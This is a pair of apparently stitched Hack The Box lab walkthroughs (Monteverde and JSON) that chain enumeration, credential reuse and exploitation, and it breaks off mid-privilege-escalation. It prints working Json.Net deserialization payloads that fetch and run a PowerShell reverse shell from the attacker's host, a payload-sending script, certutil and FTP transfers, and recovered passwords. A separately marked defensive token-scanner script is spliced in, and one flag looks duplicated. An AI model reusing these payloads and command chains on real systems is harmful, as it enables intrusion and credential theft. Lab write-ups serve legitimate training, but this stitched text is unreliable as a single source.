htb-monteverde-nl

As always we start with an nmap scan

# Nmap 7.80 scan initiated Mon Jan 13 07:39:41 2020 as: nmap -A -oN fullscan-A 10.10.10.172
Nmap scan report for 10.10.10.172
Host is up (0.081s latency).
Not shown: 989 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings: 
| DNSVersionBindReqTCP: 
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-01-13 12:50:36Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=1/13%Time=5E1C651E%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 10m42s
| smb2-security-mode: 
| 2.02: 
|_ Message signing enabled and required
| smb2-time: 
| date: 2020-01-13T12:53:03
|_ start_date: N/A

TRACEROUTE (using port 135/tcp)
HOP RTT ADDRESS
1 104.46 ms 10.10.16.1
2 104.61 ms 10.10.10.172

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jan 13 07:44:56 2020 -- 1 IP address (1 host up) scanned in 315.99 seconds

I found the users with:

root@kali:~/htb/monteverde# ldapsearch -h 10.10.10.172 -p 389 -x -b "dc=MEGABANK,dc=LOCAL" > ldaplogall.txt
In the output I also found the following group:
# Azure Admins, Groups, MEGABANK.LOCAL
dn: CN=Azure Admins,OU=Groups,DC=MEGABANK,DC=LOCAL
objectClass: top
objectClass: group
cn: Azure Admins
member: CN=Mike Hope,OU=London,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
member: CN=AAD_987d7f2f57d2,CN=Users,DC=MEGABANK,DC=LOCAL
member: CN=Administrator,CN=Users,DC=MEGABANK,DC=LOCAL
distinguishedName: CN=Azure Admins,OU=Groups,DC=MEGABANK,DC=LOCAL
instanceType: 4
whenCreated: 20200103001011.0Z
whenChanged: 20200103001032.0Z
uSNCreated: 36889
uSNChanged: 36897
name: Azure Admins
objectGUID:: iCAImwQrNUW6YeEQTXxy+w==
objectSid:: AQUAAAAAAAUVAAAAcwNaF5NorjL0aY3UKQoAAA==
sAMAccountName: Azure Admins
sAMAccountType: 268435456
groupType: -2147483646
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL
dSCorePropagationData: 20200103123551.0Z
dSCorePropagationData: 16010101000001.0Z

Log in to SMB as SABatchJobs:SABatchJobs and find an XML file in mhope's home directory:
root@kali:~/htb/monteverde# smbmap -u SABatchJobs -p SABatchJobs -d MEGABANK -H 10.10.10.172
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.172...
[+] IP: 10.10.10.172:445 Name: MEGABANK.local 
Disk Permissions
---- -----------
ADMIN$ NO ACCESS
azure_uploads READ ONLY
C$ NO ACCESS
E$ NO ACCESS
IPC$ READ ONLY
NETLOGON READ ONLY
SYSVOL READ ONLY
users$ READ ONLY
root@kali:~/htb/monteverde# smbclient //10.10.10.172/users$ -U SABatchJobs
Enter WORKGROUP\SABatchJobs's password: SABatchJobs
Try "help" to get a list of possible commands.
smb: \> ls
.        D 0 Fri Jan 3 08:12:48 2020
..       D 0 Fri Jan 3 08:12:48 2020
dgalanos D 0 Fri Jan 3 08:12:30 2020
mhope    D 0 Fri Jan 3 08:41:18 2020
roleary  D 0 Fri Jan 3 08:10:30 2020
smorgan  D 0 Fri Jan 3 08:10:24 2020

524031 blocks of size 4096. 519955 blocks available
smb: \> cd mhope
smb: \mhope\> dir
.       D 0 Fri Jan 3 08:41:18 2020
..      D 0 Fri Jan 3 08:41:18 2020
azure.xml AR 1212 Fri Jan 3 08:40:23 2020

524031 blocks of size 4096. 519955 blocks available
smb: \mhope\> get azure.xml
getting file \mhope\azure.xml of size 1212 as azure.xml (6.0 KiloBytes/sec) (average 6.0 KiloBytes/sec)
smb: \mhope\>
root@kali:~/htb/monteverde# cat azure.xml 
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
<T>System.Object</T>
</TN>
<ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
<Props>
<DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
<DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
<G N="KeyId">00000000-0000-0000-0000-000000000000</G>
<S N="Password">4n0therD4y@n0th3r$</S>
</Props>
</Obj>

Because the file was in the “mhope” user's directory, you can guess that this is his password: mhope:4n0therD4y@n0th3r$

With evil-winrm you can connect to the victim and get the user’s flag:

root@kali:/opt/evil-winrm# ./evil-winrm.rb -i MEGABANK.LOCAL -u mhope -p '4n0therD4y@n0th3r$'

Info: Starting Evil-WinRM shell v1.6
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\mhope\Documents> cd ..
*Evil-WinRM* PS C:\Users\mhope> cd Desktop
*Evil-WinRM* PS C:\Users\mhope\Desktop> type user.txt
4961976bd7d8f4eeb2ce3705e2f212f2

Getting root

If you look at the rights of this user, you can see that he is a member of the Azure Admins group, which means he can run a DCSync.

Running the attack is as easy as downloading the PS1 script from:

https://raw.githubusercontent.com/Hackplayers/PsCabesha-tools/master/Privesc/Azure-ADConnect.ps1

More info: https://blog.xpnsec.com/azuread-connect-for-redteam/

Next we execute:

root@kali:/opt/evil-winrm# ./evil-winrm.rb -i MEGABANK.LOCAL -u mhope -p '4n0therD4y@n0th3r$'

*Evil-WinRM* PS C:\Users\mhope\Documents> upload /root/htb/monteverde/Azure-ADConnect.ps1 c:\windows\system32\spool\drivers\color\shellcode.xml
Info: Uploading /root/htb/monteverde/Azure-ADConnect.ps1 to c:\windows\system32\spool\drivers\color\shellcode.xml

Data: 3016 bytes of 3016 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\windows\system32\spool\drivers\color> ren shellcode.xml Azure-ADConnect.ps1
*Evil-WinRM* PS C:\windows\system32\spool\drivers\color> ./Azure-ADConnect.ps1
*Evil-WinRM* PS C:\windows\system32\spool\drivers\color> Import-Module ./Azure-ADConnect.ps1 
*Evil-WinRM* PS C:\windows\system32\spool\drivers\color> Azure-ADConnect -server 127.0.0.1 -db ADSync
[+] Domain: MEGABANK.LOCAL
[+] Username: administrator
[+]Password: d0m@in4dminyeah!

With the administrator's password you can log in via WinRM and get the root flag:

root@kali:/opt/evil-winrm# ./evil-winrm.rb -i MEGABANK.LOCAL -u administrator -p 'd0m@in4dminyeah!'

Info: Starting Evil-WinRM shell v1.6
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> 
*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
12909612d25c8dcf6e5a07d1a804a0bc

Some earlier attempts that failed, for reference (an SMB1-only share refused by the host, and an AV-blocked certutil download):

root@kali:~/htb/monteverde# impacket-smbserver share ./
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
C:\windows\system32\spool\drivers\color>copy \\10.10.16.70\share\Azure-ADConnect.ps1 C:\windows\system32\spool\drivers\color\Azure-ADConnect.ps1
copy \\10.10.16.70\share\Azure-ADConnect.ps1 C:\windows\system32\spool\drivers\color\Azure-ADConnect.ps1
You can't connect to the file share because it's not secure. This share requires the obsolete SMB1 protocol, which is unsafe and could expose your system to attack.
Your system requires SMB2 or higher. For more info on resolving this issue, see: https://go.microsoft.com/fwlink/?linkid=852747
root@kali:~/htb# rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.16.70] from (UNKNOWN) [10.10.10.172] 61971
Microsoft Windows [Version 10.0.17763.914]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\windows\system32\spool\drivers\color>whoami /all
whoami /all

USER INFORMATION
----------------

User Name SID 
============== ============================================
megabank\mhope S-1-5-21-391775091-850290835-3566037492-1601

--snip--

C:\windows\system32\spool\drivers\color>powershell -nop -Exec Bypass
certutil -urlcache -split -f http://10.10.16.70/Azure-ADConnect.ps1 c:\windows\system32\spool\drivers\color\Azure-ADConnect.ps1
  This script contains malicious content and has been blocked by your antivirus software.

Author: Puckiestyle

htb-json-nl

As always, first an nmap scan

root@kali:~/htb/json# nmap -sV 10.10.10.158
Starting Nmap 7.80 (https://nmap.org) at 2020-01-13 03:59 EST
Nmap scan report for 10.10.10.158
Host is up (0.077s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp FileZilla ftpd
80/tcp open http Microsoft IIS httpd 8.5
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/.
Nmap done: 1 IP address (1 host up) scanned in 62.63 seconds

The initial analysis of the FTP, SMB and PowerShell ports was not very helpful, so I continued with the web pages.

The web page showed a login screen, but a simple guess of Admin:Admin as the username/password combination let me in.

After analyzing all requests in Burp Suite, the request to /api/Account stood out, because the name of the box is JSON and this is the only request with a JSON response. I looked closely at the request in Burp and noticed that it carried an OAuth2 cookie and a Bearer token, so I kept concentrating on that using curl.

c:\PENTEST> curl -XGET http://10.10.10.158/api/Account
{"Message": "Authorization has been denied for this request."}
c:\PENTEST> curl -XGET http://10.10.10.158/api/Account --header "Cookie: OAuth2=eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0=" --header "Bearer: eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0="
{"Id":1,"UserName":"admin","Password":"21232f297a57a5a743894a0e4a801fc3","Name":"User Admin HTB","Role":"Administrator"}

If I repeat the request with Curl, I get a JSON string back with an ID, the username, a password and some other stuff. So let’s take a closer look at that “Bearer string”.

root@kali:~/htb/json# echo -n eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0= | base64 -d
{"Id": 1, "UserName": "admin", "Password": "21232f297a57a5a743894a0e4a801fc3", "Name": "User Admin HTB", "Role": "Administrator"}

Apparently the token contains exactly what the API returns. But what happens if I change the Id value (an integer) to a string value?

root@kali:~/htb/json# echo -n {"Id":a,"UserName":"admin","Password":"21232f297a57a5a743894a0e4a801fc3","Name":"User Admin HTB","Rol":"Administrator"} | base64 |tr -d '\n'; echo
SWQ6YSBVc2VyTmFtZTphZG1pbiBQYXNzd29yZDoyMTIzMmYyOTdhNTdhNWE3NDM4OTRhMGU0YTgwMWZjMyBOYW1lOlVzZXIgQWRtaW4gSFRCIFJvbDpBZG1pbmlzdHJhdG9y

root@kali:~/htb/json# curl -XGET http://10.10.10.158/api/Account --header "Cookie: OAuth2=eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0=" --header "Bearer: SWQ6YSBVc2VyTmFtZTphZG1pbiBQYXNzd29yZDoyMTIzMmYyOTdhNTdhNWE3NDM4OTRhMGU0YTgwMWZjMyBOYW1lOlVzZXIgQWRtaW4gSFRCIFJvbDpBZG1pbmlzdHJhdG9y"
{"Message":"An error has occurred.","ExceptionMessage":"Cannot deserialize Json.Net Object","ExceptionType":"System.Exception","StackTrace":null}r

So it gives an error because it cannot deserialize a Json.Net object. After some searching I came across this document, which specifically states that this is not a JSON vulnerability but a deserialization vulnerability. Looking a bit further, they specifically mention that Json.Net is also affected: apparently it is possible to inject code if you have control over the Type value of the serialized object. I started a Python web server to host a custom nishang PowerShell script, as Ippsec shows in several videos:

root@kali:~/JSON# cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 reverse.ps1
root@kalivm:~/JSON# echo "Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.70 -Port 443" >> puckieshell443.ps1
root@kali:~/JSON# python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

After that change, I started creating the required Json.Net payloads, as shown in the Breeze demo of the Black Hat talk.

See below the RCE “proof of concept” with Burp, ysoserial.exe and tcpdump:

c:\PENTEST\ysoserial> ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "ping 10.10.16.70" -t
{
    '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
    'MethodName':'Start',
    'MethodParameters':{
        '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
        '$values':['cmd', '/c ping 10.10.16.70']
    },
    'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}
c:\PENTEST\ysoserial>
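As an added defensive example (not code from the original post or the box), this Python script inspects Bearer/OAuth2 values the way an audit-log parser or a WAF rule would: it base64-decodes the value and flags any `$type` hint, using the gadget type names from the ysoserial output above. The admin token is the one from the box; the gadget document and the `GADGET_TYPES` list are constructed assumptions for illustration.

```python
import base64
import binascii
import json
import re

# Type names from the ObjectDataProvider chain in the ysoserial.net output above.
# A real deployment would allowlist the few types the application serializes
# (or disable TypeNameHandling entirely); this denylist is only for illustration.
GADGET_TYPES = {
    "System.Windows.Data.ObjectDataProvider",
    "System.Diagnostics.Process",
}

# Json.Net accepts single-quoted documents that the strict json module rejects,
# so a regex fallback still finds '$type' hints when strict parsing fails.
TYPE_HINT_RE = re.compile(r"""["']\$type["']\s*:\s*["']([^"']+)["']""")


def decode_base64(token: str):
    """Decode a base64 token value, tolerating missing '=' padding.
    Returns (bytes, None) on success or (None, reason) on failure."""
    stripped = token.strip().rstrip("=")
    padded = stripped + "=" * (-len(stripped) % 4)
    try:
        return base64.b64decode(padded, validate=True), None
    except (binascii.Error, ValueError) as exc:
        return None, f"not base64: {exc}"


def encode_token(document: str) -> str:
    """Inverse helper used to build sample tokens in the format the API uses."""
    return base64.b64encode(document.encode("utf-8")).decode("ascii")


def type_hints_from_json(obj, path="$"):
    """Yield (path, type name) for every '$type' key in a parsed JSON document."""
    if isinstance(obj, dict):
        for key, value in obj.items():
            if key == "$type" and isinstance(value, str):
                yield path, value
            yield from type_hints_from_json(value, f"{path}.{key}")
    elif isinstance(obj, list):
        for index, value in enumerate(obj):
            yield from type_hints_from_json(value, f"{path}[{index}]")


def extract_type_names(raw: bytes):
    """Return all '$type' values in a decoded token body. Strict JSON is walked
    structurally; anything else is scanned with the regex fallback."""
    text = raw.decode("utf-8", errors="replace")
    try:
        return [name for _, name in type_hints_from_json(json.loads(text))]
    except json.JSONDecodeError:
        return TYPE_HINT_RE.findall(text)


def classify_token(token: str) -> dict:
    """Classify a token as 'malformed' (not base64), 'plain' (no type hints),
    'typed' (type hints present, none known as gadgets) or 'gadget'. Any '$type'
    is a finding: a session token never needs to name a CLR type to construct."""
    raw, err = decode_base64(token)
    if err:
        return {"verdict": "malformed", "types": [], "reason": err}
    # Json.Net type names look like "Namespace.Type, Assembly, Version=...";
    # only the part before the first comma identifies the type.
    names = [n.split(",")[0].strip() for n in extract_type_names(raw)]
    if not names:
        return {"verdict": "plain", "types": [], "reason": "no $type keys"}
    hits = [n for n in names if n in GADGET_TYPES]
    return {
        "verdict": "gadget" if hits else "typed",
        "types": names,
        "reason": ", ".join(hits) if hits else "unrecognised $type hint",
    }


# Samples: the admin token from the box, and a constructed single-quoted
# document shaped like the ysoserial.net output (no command inside).
ADMIN_TOKEN = "eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0="
GADGET_DOC = (
    "{'$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework',"
    "'MethodName':'Start',"
    "'ObjectInstance':{'$type':'System.Diagnostics.Process, System'}}"
)
GADGET_TOKEN = encode_token(GADGET_DOC)

if __name__ == "__main__":
    for label, value in (("admin", ADMIN_TOKEN), ("gadget", GADGET_TOKEN), ("junk", "not*base64")):
        print(f"{label:7s} {classify_token(value)}")
```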

While I was messing around with this stuff, I got tired of having to encode the payloads base64 and then resend it, so I decided to create a simple python script to do that for me.

root@kali:~/htb/json# cat htb-json.py
#!/usr/bin/env python3
from base64 import b64encode
import argparse
import requests

parser = argparse.ArgumentParser(description='pass the attack script.')
parser.add_argument("-s", '--script', required=True,
                    help='script to process for the attack')
args = parser.parse_args()

# Base64 of the admin account object, sent as the OAuth2 cookie
admin_token = "eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0="

# Base64 encode the provided payload file
def create_payload(package):
    with open(package, 'rb') as handle:
        payload = handle.read()
    return b64encode(payload).decode('UTF-8')

# Send the payload file in the Bearer header
print("Sending payload:", args.script)
requests.get('http://10.10.10.158/api/Account',
             headers={
                 'Cookie': 'OAuth2=' + admin_token,
                 'Bearer': create_payload(args.script)
             })

Quite a bit of hassle later, I finally had the first payload, which makes PowerShell issue a web request to fetch the modified PowerShell reverse shell:

root@kali:~/htb/json# cat getPS1.plain 
{
    '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35', 
    'MethodName':'Start',
    'MethodParameters':{
        '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
        '$values':['cmd','/c powershell Invoke-WebRequest -Uri "http://10.10.16.70:8000/puckieshell443.ps1" -OutFile "c:\\windows\\temp\\sedje.ps1"']
    },
    'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}

root@kali:~/htb/json# python3 htb-json.py -s getPS1.plain
Sending payload:  getPS1.plain

And in the python web server shell I see the incoming GET request from the JSON box for the reverse.ps1 file.

root@kali:~/htb# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.158 - - [13/Jan/2020 03:04:51] "GET /puckieshell443.ps1 HTTP/1.1" 200 -

The next step is to build the second object file, the one that executes the downloaded PowerShell script; after some hassle with that file I ended up with the following lines:

root@kali:~/htb/json# cat execPS1.plain
{
    '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
    'MethodName':'Start',
    'MethodParameters':{
        '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
        '$values':['cmd', '/c powershell c:\\windows\\temp\\sedje.ps1']
    },
    'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}

And in the terminal where the netcat listener has been waiting, after a moment I see:

root@kali:~/htb# rlwrap nc -nvvp 443
listening on [any] 443 ...
connect to [10.10.16.70] from (UNKNOWN) [10.10.10.158] 49275
Windows PowerShell running as user JSON$ on JSON
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv>

Yes, I have a shell! The next thing to do is check who I am and capture the user’s flag:

PS C:\windows\system32\inetsrv> whoami
json\userpool
PS C:\windows\system32\inetsrv> Get-Content c:\Users\userpool\Desktop\user.txt
34459a01f50050dc410db09bfb9f52bb34459a01

Additional note

I received feedback that the command I used in the payload could have been even simpler. Instead of the ‘cmd’ and ‘/c’ arguments, the following would have worked just as well:

{
    '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35', 
    'MethodName':'Start',
    'MethodParameters':{
        '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
        '$values':['powershell','Invoke-WebRequest -Uri "http://10.10.16.70:8000/reverse.ps1" -OutFile "c:\\windows\\temp\\sedje.ps1"']
    },
    'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}

Privilege Escalation

After poking around and performing the usual PrivEsc checks, I find an interesting file in the Sync2FTP directory:

PS C:\Program Files\Sync2Ftp> type SyncLocation.exe.config
<?xml version="1.0" encoding="utf-8" ?>
<configuration>
  <appSettings>
    <add key="destinationFolder" value="ftp://localhost/"/>
    <add key="sourcefolder" value="C:\inetpub\wwwroot\jsonapp\Files"/>
    <add key="user" value="4as8gqENn26uTs9srvQLyg=="/>
    <add key="minute" value="30"/>
    <add key="password" value="oQ5iORgUrswNRsJKH9VaCw=="></add>
    <add key="SecurityKey" value="_5TL#+GWWFv6pfT3!GXw7D86pkRRTv+$$tk^cL5hdU%"/>
  </appSettings>
  <startup>
    <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2" />
  </startup>


</configuration>

The file appears to contain a username and a password that look like base64 strings, plus a security key. Decoding the base64 strings only gave me unreadable bytes, so I decided to run SyncLocation.exe, which ran without any issues. Since the .exe is likely to use the .config file, I copy both files to a writable folder so that I can transfer them out of the box for further analysis.

C:\Program Files\Sync2Ftp> mkdir c:\windows\temp\sedje

    Directory: C:\windows\temp

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
d----         10/5/2019   9:08 PM            sedje

PS C:\Program Files\Sync2Ftp> cd c:\windows\temp\sedje
PS C:\windows\temp\sedje> copy "C:\Program Files\Sync2Ftp\SyncLocation.exe" .
PS C:\windows\temp\sedje> copy "C:\Program Files\Sync2Ftp\SyncLocation.exe.config" .

Now that those files are ready, I have to start a local FTP server to catch the files. Python can easily do this using the pyftpdlib library.

root@kalivm:~/JSON# python -m pyftpdlib -p 21 -w
/usr/lib/python2.7/dist-packages/pyftpdlib/authorizers.py:244: RuntimeWarning: write permissions assigned to anonymous user.
  RuntimeWarning)
[I 2019-10-05 21:15:22] >>> starting FTP server on 0.0.0.0:21, pid=10105 <<<
[I 2019-10-05 21:15:22] concurrency model: async
[I 2019-10-05 21:15:22] masquerade (NAT) address: None
[I 2019-10-05 21:15:22] passive ports: None

In the Windows box, I create an ftp script and transfer the files to my local computer.

PS C:\windows\temp\sedje> dir
    Directory: C:\windows\temp\sedje
Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-ar--         5/23/2019   2:48 PM       9728 SyncLocation.exe
-a---         5/23/2019   3:08 PM        591 SyncLocation.exe.config

PS C:\windows\temp\sedje> echo "open 10.10.16.70" > ftp
PS C:\windows\temp\sedje> echo "anonymous" >> ftp
PS C:\windows\temp\sedje> echo "" >> ftp
PS C:\windows\temp\sedje> echo "put SyncLocation.exe" >> ftp
PS C:\windows\temp\sedje> echo "put SyncLocation.exe.config" >> ftp
PS C:\windows\temp\sedje> echo "quit" >> ftp
PS C:\windows\temp\sedje> ftp -s:ftp
ftp> open 10.10.16.70
Connected to 10.10.16.70.
220 pyftpdlib 1.5.4 ready.
User (10.10.16.70:(none)):
331 Username ok, send password.

230 Login successful.
ftp> put SyncLocation.exe
200 Active data connection established.
125 Data connection already open. Transfer starting.
226 Transfer complete.
ftp: 9728 bytes sent in 0.16Seconds 62.36Kbytes/sec.
ftp> put SyncLocation.exe.config
200 Active data connection established.
125 Data connection already open. Transfer starting.
226 Transfer complete.
ftp: 591 bytes sent in 0.01Seconds 39.40Kbytes/sec.
ftp> quit
221 Goodbye.
PS C:\windows\temp\sedje>

So the FTP script says the files are being transferred. Time to check the FTP server for the same.

root@kali:~/htb/json# python -m pyftpdlib -p 21 -w
/usr/lib/python2.7/dist-packages/pyftpdlib/authorizers.py:244: RuntimeWarning: write permissions assigned to anonymous user.
  RuntimeWarning)
[I 2020-01-13 05:33:01] >>> starting FTP server on 0.0.0.0:21, pid=3848 <<<
[I 2020-01-13 05:33:01] concurrency model: async
[I 2020-01-13 05:33:01] masquerade (NAT) address: None
[I 2020-01-13 05:33:01] passive ports: None
[I 2020-01-13 05:35:07] 10.10.10.158:49859-[] FTP session opened (connect)
[I 2020-01-13 05:35:07] 10.10.10.158:49859-[anonymous] USER 'anonymous' logged in.
[I 2020-01-13 05:35:07] 10.10.10.158:49859-[anonymous] STOR /root/htb/json/SyncLocation.exe completed=1 bytes=9728 seconds=0.28
[I 2020-01-13 05:35:08] 10.10.10.158:49859-[anonymous] STOR /root/htb/json/SyncLocation.exe.config completed=1 bytes=591 seconds=0.14
[I 2020-01-13 05:35:08] 10.10.10.158:49859-[anonymous] FTP session closed (disconnect).
^C[I 2020-01-13 05:37:28] received interrupt signal
[I 2020-01-13 05:37:28] >>> shutting down FTP server (1 active socket fds) <<<
root@kali:~/htb/json# ls
execPS1.plain htb-json nmap-json.gnmap nmap-json.xml SyncLocation.exe.config
getPS1.plain htb-json.py nmap-json.nmap SyncLocation.exe

After the files are transferred, I move them to a local Windows VM, because that is easier than analyzing on Linux, and open the .exe in dnSpy.

In the binary there is a clearly readable Decrypt() function that needs a key and a value to decode the base64-encoded strings. Since I'm not very good with .NET, I look for a simple solution online.

I find that solution in dotnetfiddle, an online tool that can run .NET code. After modifying the code by adding the key and calling the function twice, once with each base64 string, I get the results:
Username: superadmin
Password: funnyhtb

Now there are still several places where I can try these login details. After some hassle with PowerShell privilege escalation, I got a hint that I should try a different path: the FTP server.

c:\PENTEST>ftp 10.10.10.158
Connected to 10.10.10.158.
220-FileZilla Server 0.9.60 beta
220-written by Tim Kosse (tim.kosse@filezilla-project.org)
220 Please visit https://filezilla-project.org/
202 UTF8 mode is always enabled. No need to send this command.
User (10.10.10.158:(none)): superadmin
331 Password required for superadmin
Password:
230 Logged on

root@kalivm:~/~# ftp 10.10.10.158
Connected to 10.10.10.158.
220-FileZilla Server 0.9.60 beta
220-written by Tim Kosse (tim.kosse@filezilla-project.org)
220 Please visit https://filezilla-project.org/
Name (10.10.10.158:root): superadmin
331 Password required for superadmin
Password:
230 Logged on
Remote system type is UNIX.

Bingo! Logged in to the FTP server, all that was left to do was check the Desktop for the flag and get it:

ftp> dir Desktop
200 Port command successful
150 Opening data channel for directory listing of "/Desktop"
-r--r--r-- 1 ftp ftp            282 May 22  2019 desktop.ini
-r--r--r-- 1 ftp ftp             32 May 22  2019 root.txt
226 Successfully transferred "/Desktop"
ftp> get Desktop/root.txt ./root.txt
local: ./root.txt remote: Desktop/root.txt
200 Port command successful
150 Opening data channel for file download from server of "/Desktop/root.txt"
226 Successfully transferred "/Desktop/root.txt"
32 bytes received in 0.00 secs (223.2143 kB/s)
ftp> 221 Goodbye
root@kali:~/JSON# cat root.txt
3cc85d1bed2ee84af4074101b991d441

The JuicyPotato way to escalate to root

When running systeminfo I saw it was Windows Server 2012 Datacenter, which is most likely vulnerable to JuicyPotato. So I uploaded the exploit, searched http://ohpe.it/juicy-potato/CLSID/Windows_Server_2012_Datacenter/ for a CLSID that runs as NT AUTHORITY\SYSTEM, and used it to run nc.exe:

PS C:\windows\temp\sedje> whoami /priv

PRIVILEGES INFORMATION
